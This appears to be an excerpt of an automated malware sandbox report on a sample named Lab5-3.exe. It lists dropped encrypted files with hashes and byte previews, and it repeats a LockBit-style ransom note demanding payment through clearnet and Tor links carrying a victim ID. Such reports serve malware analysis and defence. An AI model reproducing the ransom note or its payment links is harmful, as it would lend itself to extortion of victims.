                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42256
                                                                                                          Entropy (8bit):7.995083925387046
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:qX9xa8qD3QCXoPFagsYXx5FFGLoj5MNMcmGMkSwnfelbKV449tPniawhBZ:BAa7YrFsOsrmGyWV42R6Z
                                                                                                          MD5:02527F4BA13F9C4508B78F28379864CD
                                                                                                          SHA1:6A2D692006A500B54653DEEFF2FC74E3BA565305
                                                                                                          SHA-256:6052DD86A075F8A1933459E9F43CB59FD40DD673033211F651081710A1691D8F
                                                                                                          SHA-512:03E322D42A4CB18E84BBC42B28F64F275DA56F9637D94773E41155E2EE12072D857C42A61DEC2C421F6678C51B08A76B22D1DF0F94DB96C4B6CF89C8AEA2F94F
                                                                                                          Malicious:false
                                                                                                          Preview:+..I];t....q5.j.M.C..z.7.W...,.......*.CV..CN.#....gi.......VE.....`.Zq.#v..;.t8.pq..@..$)rx+..F... .|xY........c..:..$.G.P....p8...2.....*.U..}.<.J.#.....(V...{.8...U.r..d..B....s..0..QM^.Z....n..+...<..ET@b.8.W...hZ...8k.....z*.`Lm.......^.....mCzf.Pd:m..e../...Yh.......5.E....@.QZ..d..O..R.4].).....-.9.a..z...h..@..+[>."........q..\e.....}..6O.C...9&.e.PiG........L.ld.R....-.....:_FW_S....@3.......b;.........[q.......WqElF....m.E..@..&,UY......r!~...~.w .....kqwVfH..w.....~*l&.....i!,;b...:.....r{:.=.,...pdsuR.4r..q...^.7-z..z..Q.G...xI..... Q..JJ.8\+H|...5..N[..K.3JZr}.N..m..d........&..:.6y.>..:....PkDc8M......._.......<..U...{.I....Uo*.7..#..;.@....].....5....j9...G...`...2_.O.<G)...a....PM.0...L$...zr.?.[...........2.._..........t.7.n[2.ytw..R..R.k...U..,.'..............e.+.;...j2.UM....._[S.2....Ou..P....-w.G............_.!......iY..K'V.i\.ud....6.G..Dj..4. .7..k..\I.Ip....C.'.j.pN...A....@.O,5..h.....XGu..w...he.`....z.......;.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):38240
                                                                                                          Entropy (8bit):7.99473904263657
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:tN37JA6U+iFxh1b4dBaqJS6aH+g8JoRhsovJTeJNFaGnEYjTIERZ:tN3G6pG31b4di9+lavJTCXaGbTIaZ
                                                                                                          MD5:9860E4502838D3FA21A0E42E01DE7035
                                                                                                          SHA1:462F5A8B71F8977D225A1A61A12B9A24587C5EED
                                                                                                          SHA-256:FF33EA806BD97D29A015976B69B578A147BCA9AB398C77F114141A8163DA6B33
                                                                                                          SHA-512:CE8470FC20B8B8B473C7CC720684DD62BE9CBA04F55A987CC556D90EF93C44FAB3ACA7AF6BD21330EF1F1DEFFBFDB45B152D9D3A0D14A7AE9CA4D4E98C06F91B
                                                                                                          Malicious:true
                                                                                                          Preview:.M.....j..R..<......sL..cw..djt...[.!{.N.......daF_....0..H..H&"..8..6....T.4A>F}..s.rV?5;"...nj.*t...#&......E..l..;...b../...O..4.F03.........).>.p...>unAV.Y[$.?...d.b.3... ...0ZEk.X..G.........T(.s............j.K3....;iV.I...KU.B.@..........\..U`.P..j..[.....|....s....<.+f.I;;.>.9...rP..<e..M.d..U0Qa....!.YL....oM..HY......B..+@I}....k[...Y.. q^?;.3L.0.o'-H..5..Q}..c^_.CAbW...@._W.F.j:f4L..3?)p...p..R'...a....E.....y.TV...B;.Y.Q.s0.'z...........#..o:........C6.1.cMg..........Fw....Z.g.A.........#..yK.31...,.~..w..,1.'r3.t^.....j.&....:p.L.D$..S..88*........KS...e.....*..2B....z.)1R}.X..#.X...{EN....c..s.:U$s.\}b..1..........g.d$22....'fr.TL.aQu..I. .).'....3.b.t._[o-X..S.....+....}.C.d4......_..X'.!Xn....t/.....#hi....j.07.........?../G....@.?hdT. ......... .nlm.Ye...e............N....X..r~.y...XM!.g.f?v.....sVD...A.@(:n.'...)..MQ<.Q.G..I.s=n.0.3.I.......$I.r........W=.2..2.9yeOy2.I. K......O. ."%....e..W.,.%4}|.Z..DP.(F....N.....a...G...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41712
                                                                                                          Entropy (8bit):7.9957389225064
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:sGvHAMa6pp3j7XhcR6hopzfcUlrs0h9tmnAHi2EgQ0Ss5DyTmalAhjjMRQYBZ:nIFq3PQuopzfcUlr5Fmci2EF9gkmIAlU
                                                                                                          MD5:88434C07FCF5575C67682DA7EE8D3290
                                                                                                          SHA1:801E118B232F624801219A0010AC306AB1F5FDDE
                                                                                                          SHA-256:D3E461D1189C0F050DDBB1846BBDA58DB1B843A82D8E6B80899FB57CA2E7EC21
                                                                                                          SHA-512:032AD333CD55BC5B83514419A74FB7B91027B9ADE97A26706B96093D79A0C6F955F506A00204FD8F6E9BB1B580EC85DEBAFB05CC1E645584B6A1449144BBF5A4
                                                                                                          Malicious:false
                                                                                                          Preview:.81.+~.X.b......w.ByqO...6.....G..}eC.....[.F.i...(.;}vqy...K'.}%a)m......T.......w....lUD.K......^8.}.HS.S3i[P........].$h.. ..1.B..).......dN.i-n.......[...i.3..o].|k5.aw%.>.y..pQ.gz...U...<.a........:..5x=K.<..n...d.F.......1.7..l....).1uY.?Jl...z..'7..o..., .S.E0....5.......L.R.P.....s.yMJM....%.}h..P.d.&.s.1...]-..?./5.D...*..8s.4.v.....G..^..b...".BPR..........@a.I.!.W.......g...@..l.FQb/p......{3..R../.[.|TS.IZi...z.......hf.-m....3....I....L../..R3xz.f..k..3..G-...f......Z.L..q..ERf4.........M.TO....'......h...rEdUG`}.?G.....vG.....>...<..2y...C..<.;0-{.[A.....S..T.....i.m..0...:....-..\e^SN.Rs.Z.4..rf.}..eB^Yj.Z..-.>:..{....%....<%....;.........@.`.M...<......zD+..G..9.=..fB.x.. I)...Z.P.....B.5pUP.a.[...d...VE..6..._W.gD...i..hc.......h.'5+c._.LwS....7...}.5......=.....+tXE.X./$b].v..hI2.........Q.>.My......R..-..r.Z..6..\J.....P.Z....&.*.....t|...'..]l.b .............O4...a...-x......j.._no%1.......[I..........e.{..+...O...;./.
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41872
                                                                                                          Entropy (8bit):7.995858623228556
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:xQfW93Dl7/JKW9ak5HL/4d+m/bQhoQm/v81L5V269VZmKouXapCYTZ:iiDFRB1L/4dvshRSSL7dFouXapzZ
                                                                                                          MD5:181F5B7A4E514A1DDC834D2D774803BD
                                                                                                          SHA1:9EEBDFBE3B714C88F8CA4BC3D109A52F779BC780
                                                                                                          SHA-256:4EEA16E5076EDAD16B690784C8AF6E4A47C9536C6D03277602F97C8C522D29C5
                                                                                                          SHA-512:3AEA8B76E753C6396292110CC9E590190BEDDB5B7118AA424FB38A2788F955731D5AF6BC5177159795A66C4049E6B68EDF6A668DD0B42BF9D2CD2DBAC69AE100
                                                                                                          Malicious:false
                                                                                                          Preview:P.........]?h...M..!..lR.J.. p.l.........d.Wa....../...tP..@..{..M".eN.@...x...Ql./LN./.zZQ..z....v.....1......t..D..^BSt....!+.=-~.y..~......p... ....o...b.Obp..S3..4{.?<.B....F.z.y......y.'gR.Y.c.$g/X.@..I....(.'...L.....~..B.Y.._-.hi..#n..{...g.oD6F....Mu..XZ:.,.....g..M.a.o@.w.........hF2...q.... .!...aU.J...d.62...G..J....ei/..P..F..E.z..F.H.....;v.7.I...H...#TG.._T.K....*2.2.cdj.R[i...C.t H.Z...;@.....8.:....E4........G..9.w.n...Ka..l)|..Q@......,.9..:..$.1..CA..J..).&+.}......q!..../p........<3C.t4......iO[...4b.r.........hz.....N.+..}o./."{..Y...A..eW.....D...a...P... W...v.,&.....B'..?..8.U....A.O..a.......3H.[.."....h.m...........!.....c9...3.;..z).Rj..{..f.&......(..{......z8r....@..DG...xCK..-d...7...y.A.4.he...Cv...pV.-.p..)..C..=^.Z......!JjClF...[...'......ru C?a..Qoc..bW....,.......%......T...n;2..B...lC~......C.)d0:..j.)..Q.*.{,....`..)L<i...+..4?...3.9M..Yu...;..^;....mZ.x..._4........S..y....f..s.C......]..`..E.....Si.1...
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):41488
                                                                                                          Entropy (8bit):7.995331307422304
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:P975Sbm4lCOVQ8ZwccwrPwmtXvLf870vbpMNnm8O2O/7IDW4Z:P3SbTl5VQkBXvbhv1MO2k8PZ
                                                                                                          MD5:63C0B526B7BEF437E74875AE1F22D6FA
                                                                                                          SHA1:5C988DB3E3FC296654C26080C72876F2679F59F9
                                                                                                          SHA-256:D09A8E958011BC08AF7CE69FA387E9D4AD11D6B1B470651611C34AAB4206C0DC
                                                                                                          SHA-512:92E45CA264A4EB30FD86E94629565E0105C3B2F106226AAEAAE5A5956903F9999F23F17A2454B2CD02E8ADD2261D21B34CAA1A45928212553556F0ED3AD27FAE
                                                                                                          Malicious:false
                                                                                                          Preview:...p...+...^p..Ig@.W,..Pgo8..........k.a...[......^............C....x.~.-.YEn.3.../...$..;.XQK..zS{.......Fr.2... .......a-.N.O....0. $.}.....T.....k.S'......V...:..[~..{x%uxh..\..5H..1.Gc.C....4..x...t8o...VaX|.9.<.bj!.......".1..t...(E...~.4tH..<..o}.........[.]...E..)..$.....ki...\..A.4....{.w...G...E..P~.-.Q.....9. ......../.y.`t..G..............h.-R.......f(Ii...S........3. +a....f..%..'(.k....l..my.......o.(_..5{.M..L.(..d...M..S.@;1.wm.K.d....~8.+.V..S.V.....!#.3.....`..if...XR.mC.(..+..$af......&....o.bt.L.M. .y..% Z3&.....?...'..u*%q.L..&........S...I)u.3.ZK.Q.....Fj{.k......7dhH{.U.._.. w^...d..F.>..s..K.:.M....HJ. u.....a_%......<'P.X.U6.n.....4...0.)....7o.5[s...g.g.]./r.....^a.....W..Y......X!.@..23.*.)...`.E.x. .\6...M.g...m..s<./,S9.;...._6.].r........8.p..4u..}..f.k.........._.6..B.....M..g.1.ow3)t.....D9..... ..A..R..4.Y....DF5i.I.h.rS.).6A.v;..A.VB.u...I.S1o..*.|8.vL.......j..75R.P4.Jk....?....Tv.....`.U.1.D..
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):42544
                                                                                                          Entropy (8bit):7.9951121293581835
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:wFBxDAjd2OfW8XfNDMbA2M8X5TVkQCb4IKAXqbBcic341zeagkIjOJq1t+g1TUZr:wFPDUre8XfNAbASXwb4TKqbM34cjXt+5
                                                                                                          MD5:C0D5A1AC74D36F7A30F6598A4AC26E33
                                                                                                          SHA1:CF6614F858658BE3C11BE0F02F3333085DD26CDA
                                                                                                          SHA-256:87FADD5E868E8CC0A4EBAC77F7C83C34EF39B9AD19638BEE305A450BBC7A0DD0
                                                                                                          SHA-512:8ECD4D92C55AC67B714361A71B12878BEB8EE743E9897D935ECB80C7C7DC1F777B5C2F2AE56038C059F4FF780F129238611AE84EEDCD39FA468B9301DB269BD4
                                                                                                          Malicious:false
                                                                                                          Preview:.~x%}%.'.v..'zo.....EvMO....|...l...{..n...20.?..I..7-(.L\.I..H.......7..3t.YT......a.......UHr..4.+W(.2...J..$.l...........a...)z..>..;.>.T...2.(..4M.C:....q.*..tw.......T..&$......TMWe......P:.hT..\........:.*K6V$.(+....2.|F.u.W.~L>....5.Gm-.x...k..'.b_.=OP...f...j<u.iz.h..E.........O.=...X@I......[B.^....4.8.......T.KR..j. ...g.!v.Y.BC._..09..'..`....XH.'...o.F.5:)a>.....8..5.u}5..~S.~,6.{...T4........)...,.q.J...cD.A2..)`...?>.Af...\.S....".m...o:.:...xF... ..<..1.....z.....&W.2Zd..F.....o...........A.q.'b.&.`..Y.._.]G...7...&.{..(....,..BD:$@.I...-....es...I?O.X..m.,*'..^....r.P..2O..f.0......-.....].....TD...d...k,.r.4....,..E.M.l.H......G....C.c.M\ Z.4I/P.)..j...kF2.kB.....y...\t...=.|.&N}r[..........}.....J.g....<..7..B0.J.;....1..X.N..S..s.4.4..DY*@U.......,......v.7..d6eE..o.d..pJ...Il.k...p....&`d.U.R.C.iC .........(.t.Qr..^E.].6....F..h.Ps_...,;zi...._.V.c........j$2t.jS.@.)Fy.......(M..S[Ap...2.......q9....
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):37168
                                                                                                          Entropy (8bit):7.995046972824672
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:768:TO2g8WGjxWs2NpGy3D0BEFxq8SjqebAcXmfBZ:TUpQxWVNpGEDMmjSmeEcXeZ
                                                                                                          MD5:B98B9203D897BB8154513FAB33122B42
                                                                                                          SHA1:E9A7E0DE6CC689C25A1B2B9A915013E7312A656B
                                                                                                          SHA-256:A94736DD3D21A56A22914ECF68D16007B822575690A5E165B9BA665B1DD03240
                                                                                                          SHA-512:78C19B428BC841EAAACE17C85ED5127D9B8BE6746D016B3C731705DA1D10F675B6E27F184ADBA2469F3B891BF4EC137AAE63EF69441AEEB164E01425E2C4D056
                                                                                                          Malicious:false
                                                                                                          Preview:.=lTy.Q.......d[,."h. ...e~...jFm.......*..8)`VB...<.-W.....F...4.....E..%%.(.~R..w.Z..28.F...N.;..I..%lY.I...U..............t....w...I.....4k...5A....:t.?......eC..ds..P...cb.j..X.z....C.K.B.O...%.+5..J/pMA__w.h.ju0zL..kz..F."....`.......N%Y$z.0pP;.f @V..j..W.m,H:?..{.tl.....g....#..........4.....HW...j..t.....6S..=..$.8O.Wm(.>?w.Oj.$..q.g....[)"...S_c..C8...*.R.j....B.:.....N=;..\.......}..=..i..:..o..F...O.f....+.0.+...QR.X....%g...pX..E..h.](-.Y'.X...#.*X.\Q...e=..n5..].L....1.....1.P.h~y...G-....s.(..1.....CC...5..R&..~..!k.0q.L.BQ.\.\.`........>.B.../..s....3P..o@"..|...6.E..^q...P..W..~.c.....40...d...e.T.3.F.3.g..o^?+!.(G%C.4..-n...[@v..M.....sY......;..2.@..=~S.cbB.v.+%..b.@..-R.v4.|.!D.....y.. ..y..M.#.....q.u.G...J.......{...!.X`(m..:u..E......[.. . ..PW.1i.M.M.".' ^...a.f.}&.o...,..{F......*...`aa.....$...%.>g..;g.0...1.u....=...5..Al...9<...j......Y..&va.@..$.tv6....F......)2..........{.Ob18..B.+FE..S...~.7~bN,...C.......
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1281
                                                                                                          Entropy (8bit):5.0109143188305945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:hXtdFjtPuy1DK6vh88waN7LnNvhv6M9wDKvDtrCAuVcHdBUi:hXltG76vDnNvs0LMAuyH1
                                                                                                          MD5:AD01B46BC788640E0B348FFCEAD87439
                                                                                                          SHA1:0663F726C339E9C5D0EEC46D274C7C2456843C01
                                                                                                          SHA-256:234AAED071BF79A99676C06B51F1D98432AD7C143C604EDC16664490EBF22E96
                                                                                                          SHA-512:B49EC5246753A9F857278235BEEA0A84667AF5DBCC8FA1295807F6D9248E0920EE45584DDDED739036C965C055AF2A67A8E435E502CF9C5115E0F913EA897F09
                                                                                                          Malicious:false
                                                                                                          Preview:All your important files are encrypted!..Any attempts to restore your files with the thrid-party software will be fatal for your files!..RESTORE YOU DATA POSIBLE ONLY BUYING private key from us...There is only one way to get your files back:....1) Through a standard browser(FireFox, Chrome, Edge, Opera)..| 1. Open link http://lockbit-decryptor.top/?BC76D224712A7481BC6E90ACB6D18E50..| 2. Follow the instructions on this page......2) Through a Tor Browser - recommended..| 1. Download Tor browser - https://www.torproject.org/ and install it...| 2. Open link in TOR browser - http://lockbitks2tvnmwk.onion/?BC76D224712A7481BC6E90ACB6D18E50... This link only works in Tor Browser! ..| 3. Follow the instructions on this page...... ### Attention! ###.. # lockbit-decryptor.top may be blocked. We recommend using a Tor browser to access the site.. # Do not rename encrypted files... # Do not try to decrypt using third party software, it may cause permanent data loss... # Decryption of your files wit
                                                                                                          Process:C:\Users\user\Desktop\Lab5-3.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):57952
                                                                                                          Entropy (8bit):7.996847361149469
                                                                                                          Encrypted:true
                                                                                                          SSDEEP:1536:KeFdcDjz3tnpcc3yH65GClo2ZR55Tlxl1fd/YJXrzrP3p45w/bbNM9Z:KWdcDjz35bCg7my3xl1fdQJ7/YwEZ
                                                                                                          MD5:17E436F7FA34910E6A0DD5A143043A22
                                                                                                          SHA1:00C943912B96B5B595C0D22C5462A641DE5B144E
                                                                                                          SHA-256:E499407A4DB479A2C6A85ACFAC2030A122C6E0EBDF41EC1CA1E8100E1B944FEE
                                                                                                          SHA-512:5386CFAE5F8FDBA27B6CE6A86B867BED0FE4E2BAA42C484CAC123E9BFA054591145ADCB65C0E2E36DFFB87422EFC837342048880FA7DDE5DF3A0CB105E5C7FDB
                                                                                                          Malicious:false
